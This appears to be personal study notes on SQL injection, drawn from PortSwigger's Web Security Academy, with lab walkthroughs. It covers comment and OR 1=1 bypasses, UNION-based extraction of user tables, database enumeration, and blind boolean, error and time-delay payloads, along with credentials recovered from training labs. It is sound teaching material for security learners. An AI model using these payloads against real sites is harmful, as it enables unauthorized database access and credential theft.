# SQL injection

Cheatsheet: [portswigger](https://portswigger.net/web-security/sql-injection/cheat-sheet)

Source: [portswigger](https://portswigger.net/web-security/sql-injection)

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information.
## SQL injection examples
- Retrieving hidden data, where you can modify an SQL query to return additional results.
- Subverting application logic, where you can change a query to interfere with the application's logic.
- UNION attacks, where you can retrieve data from different database tables.
- Examining the database, where you can extract information about the version and structure of the database.
- Blind SQL injection, where the results of a query you control are not returned in the application's responses.

## Retrieving hidden data
If we search `https://insecure-website.com/products?category=Gifts` the server run the following in SQL `SELECT * FROM products WHERE category = 'Gifts' AND released = 1`.\
The restriction `released = 1` is being used to hide products that are not released. For unreleased products, presumably released = 0.\
The application doesn't implement any defenses against SQL injection attacks, so an attacker can construct an attack like `https://insecure-website.com/products?category=Gifts'--`, This results in the SQL query `SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1`.
The key thing here is that the double-dash sequence `--` is a comment indicator in SQL, and means that the rest of the query is interpreted as a comment. This effectively removes the remainder of the query, so it no longer includes AND released = 1. This means that all products are displayed, including unreleased products.

If we change the url to `https://insecure-website.com/products?category=Gifts'+OR+1=1--`, the sql query will be `SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1`, which will return everything as `1=1` is true, so `category = 'Gifts' OR 1=1` is true for all.

If an application checks username and password by the following query `SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`, then the attacker can enter the parameters as `admin'--`. This will result in `SELECT * FROM users WHERE username = 'administrator'--' AND password = ''`. And the attcker is logged in as a admin.
## Retrieving data from other database tables using UNION
If an application executes the following query containing the user input "Gifts" `SELECT name, description FROM products WHERE category = 'Gifts'`, then by submitting `' UNION SELECT username, password FROM users--`. It returns all usernames and passwords.

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:
```
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
```
This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.

For a UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible between the individual queries.

To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out:

- How many columns are being returned from the original query?
- Which columns returned from the original query are of a suitable data type to hold the results from the injected query?

### Determining the number of columns required in an SQL injection UNION attack
- The first method is by using 'ORDER BY' clause and incrementing the specified column index until an error occurs. The column in an ORDER BY clause can be specified by its index, so you don't need to know the names of any columns. Eg `https://insecure-website.com/products?category=Gifts'+ORDER+BY+1--` doesn't give any error but `https://insecure-website.com/products?category=Gifts'+ORDER+BY+4--` give a error that means The ORDER BY position number 4 is out of range of the number of items in the select list.
- The second method is UNION SELECT payloads specifying a different number of null values like `' UNION SELECT NULL,NULL,NULL--`. If the number of nulls does not match the number of columns, the database returns an error.Eg: `https://insecure-website.com/products?category=Gifts'+UNION+SELECT+NULL,NULL,NULL,NULL--`

#### NOTE
- On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose. So the injected queries on Oracle would need to look like: `UNION SELECT NULL FROM DUAL--`.
- The payloads described use the double-dash comment sequence -- to comment out the remainder of the original query following the injection point. On MySQL, the double-dash sequence must be followed by a space. Alternatively, the hash character # can be used to identify a comment.
- Using `+` instead of space in the url to do SQLi like `https://insecure-website.com/products?category=Gifts'+UNION+SELECT+NULL,NULL,NULL,NULL--`

### Finding which column stores string
By submitting series of UNION SELECT payloads we can find which column stores string. Eg there are 4 columns, then by using the following payloads:
- ' UNION SELECT 'a',NULL,NULL,NULL--
- ' UNION SELECT NULL,'a',NULL,NULL--
- ' UNION SELECT NULL,NULL,'a',NULL--
- ' UNION SELECT NULL,NULL,NULL,'a'--\
The one which will not give error means that column stores string otherwise it will give a error like Conversion failed when converting the varchar value 'a' to data type int.
### Using number of columns and column's datatype, retrieve info from other table.
If we know that there are 2 col and each stores string from above methods than we can use it to retrieve data from other tables like `' UNION SELECT username, password FROM users--`
---
## Examining the database in SQL injection attacks
When exploiting SQL injection vulnerabilities, it is often necessary to gather some information about the database itself. This includes the type and version of the database software, and the contents of the database in terms of which tables and columns it contains.

### Querying the database type and version
Different databases provide different ways of querying their version. You often need to try out different queries to find one that works, allowing you to determine both the type and version of the database software.

The queries to determine the database version for some popular database types are as follows:


| Database type	| Query |
| --- | --- |
|Microsoft, MySQL |	`SELECT @@version`
Oracle|	`SELECT * FROM v$version`
PostgreSQL|	`SELECT version()`

For example, you could use a UNION attack with the following input:
`
' UNION SELECT @@version--
`
This might return output like the following, confirming that the database is Microsoft SQL Server, and the version that is being used:
```
Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)
```
### Listing the contents of the database
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:
```
SELECT * FROM information_schema.tables
```
This returns output like the following:
```
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
=====================================================
MyDatabase dbo Products BASE TABLE
MyDatabase dbo Users BASE TABLE
MyDatabase dbo Feedback BASE TABLE
```
This output indicates that there are three tables, called Products, Users, and Feedback.

You can then query information_schema.columns to list the columns in individual tables:
```
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
```
This returns output like the following:
```
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
=================================================================
MyDatabase dbo Users UserId int
MyDatabase dbo Users Username varchar
MyDatabase dbo Users Password varchar
```
This output shows the columns in the specified table and the data type of each column.
#### For Oracle type databases
You can list tables by querying all_tables:
```
SELECT * FROM all_tables
```
And you can list columns by querying all_tab_columns:
```
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
```
### Full example
We have to login into the administrator account of webapp which have SQLi and the database is Oracle type.
- This url `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle` shows the products in Lifestyle category.
- Firt we have to find the no of columns using SELECT NULL sequence like `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle'+UNION+SELECT+NULL,NULL+FROM+dual--`. It has 2 columns.
- Both are string datatype as `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle'+UNION+SELECT+'abc','abc'+FROM+dual--` doesn't give error.
- Using payload `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+table_name,NULL+FROM+all_table--` got all the tables.One table belongs to 'USERS_IYYBEU'.
- To get column names using `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name=%27USERS_IYYBEU%27--`. Got 'PASSWORD_OOXRDO','USERNAME_LUDEWV'
- Got the credentials by using `https://target-ac721fbc1edd436280e906ea00920002.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+USERNAME_LUDEWV,PASSWORD_OOXRDO+FROM+USERS_IYYBEU--`.
```
administrator
5debptt5q63ni1firpcs
carlos
j4nhpp054y8s66xr11ar
wiener
s0hdf7igoj2inl21os8q
```
---
### Retrieving multiple values within a single column
In the preceding example, suppose instead that the query only returns a single column.\
You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input:
```
' UNION SELECT username || '~' || password FROM users--
```
This uses the double-pipe sequence || which is a string concatenation operator on Oracle. The injected query concatenates together the values of the username and password fields, separated by the ~ character.\
The results from the query will let you read all of the usernames and passwords, for example:
```
administrator~s3cure
wiener~peter
carlos~montoya
```
-----
# How to detect SQL injection vulnerabilities
SQL injection can be detected manually by using a systematic set of tests against every entry point in the application. This typically involves:
- Submitting the single quote character ' and looking for errors or other anomalies.
- Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.
- Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for differences in the application's responses.
- Submitting payloads designed to trigger time delays when executed within an SQL query, and looking for differences in the time taken to respond.
- Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitoring for any resulting interactions.

## SQL injection in different parts of the query
Most SQL injection vulnerabilities arise within the WHERE clause of a SELECT query. This type of SQL injection is generally well-understood by experienced testers.

But SQL injection vulnerabilities can in principle occur at any location within the query, and within different query types. The most common other locations where SQL injection arises are:
- In UPDATE statements, within the updated values or the WHERE clause.
- In INSERT statements, within the inserted values.
- In SELECT statements, within the table or column name.
- In SELECT statements, within the ORDER BY clause.
----
# Blind SQL injection
Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.
## Exploiting blind SQL injection by triggering conditional responses
Consider an application that uses tracking cookies to gather analytics about usage. Requests to the application include a cookie header like this:
`
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
`
When a request containing a TrackingId cookie is processed, the application determines whether this is a known user using an SQL query like this:
```
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
```
This query is vulnerable to SQL injection, but the results from the query are not returned to the user. However, the application does behave differently depending on whether the query returns any data. If it returns data (because a recognized TrackingId was submitted), then a "Welcome back" message is displayed within the page.

This behavior is enough to be able to exploit the blind SQL injection vulnerability and retrieve information by triggering different responses conditionally, depending on an injected condition. To see how this works, suppose that two requests are sent containing the following TrackingId cookie values in turn:
```
…xyz' AND '1'='1
…xyz' AND '1'='2
```
The first of these values will cause the query to return results, because the injected AND '1'='1 condition is true, and so the "Welcome back" message will be displayed. Whereas the second value will cause the query to not return any results, because the injected condition is false, and so the "Welcome back" message will not be displayed. This allows us to determine the answer to any single injected condition, and so extract data one bit at a time.

**Lets find the administrator's password of the lab site**

In the login page, while logging in with a random credentials I capturing the request with burp. Let say the `TrackingId` is `xyz`. Now in burp repeater I will manipulate the `TrackingId` to find the password.
1. First change the TrackingId to `xyz' AND '1'='1`, in the response 'welcome back' is displayed. But changing to `xyz' AND '1'='2` hides the welcome back. That means app is vulnerable to Blind SQLi.
2. Now change it to: `TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a`. Verify that the condition is true, confirming that there is a table called users.
3. Now change it to: `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a`. Verify that the condition is true, confirming that there is a user called administrator.
4. To guess the length set `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a`. This condition should be true, confirming that the password is greater than 1 character in length. Using Intruder do a attack and increase the length each time. The first request to hide 'Welcome Back' is `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>20)='a` it means password length is 20 as 'length(password)>20' is false but 'length(password)>19' is true.
5. Now we have to guess the characters. for this use `TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a`. Use intruder, add the target character(here a) to position(like `TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§`) and set the payload from a-z0-9. For the correct character the 'Welcome Back message will be shown'.
6. To look for second character only change will be like this `TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a`. To this for the rest of character positions.
7. The password is `htz9ppvpxwybr4u53dse`.

In the above example the SQLi was reflected using the 'welcome back' message. In case when there is no such differences we can trigger SQL errors. Eg in the following the second statement gives divide by zero error:
```
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
```

Also we can use time delays like
```
xyz'; IF (1=2) WAITFOR DELAY '0:0:10'--
xyz'; IF (1=1) WAITFOR DELAY '0:0:10'--
```
Using this technique, we can retrieve data in the way already described, by systematically testing one character at a time:
```
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
```
**Note** In some database instead of `WAITFOR DELAY` it use `pg_sleep(10)--`

Read more on blind SQLi at [portswigger](https://portswigger.net/web-security/sql-injection/blind)

-----
## Second-order SQL injection
In second-order SQL injection (also known as stored SQL injection), the application takes user input from an HTTP request and stores it for future use. This is usually done by placing the input into a database, but no vulnerability arises at the point where the data is stored. Later, when handling a different HTTP request, the application retrieves the stored data and incorporates it into an SQL query in an unsafe way.
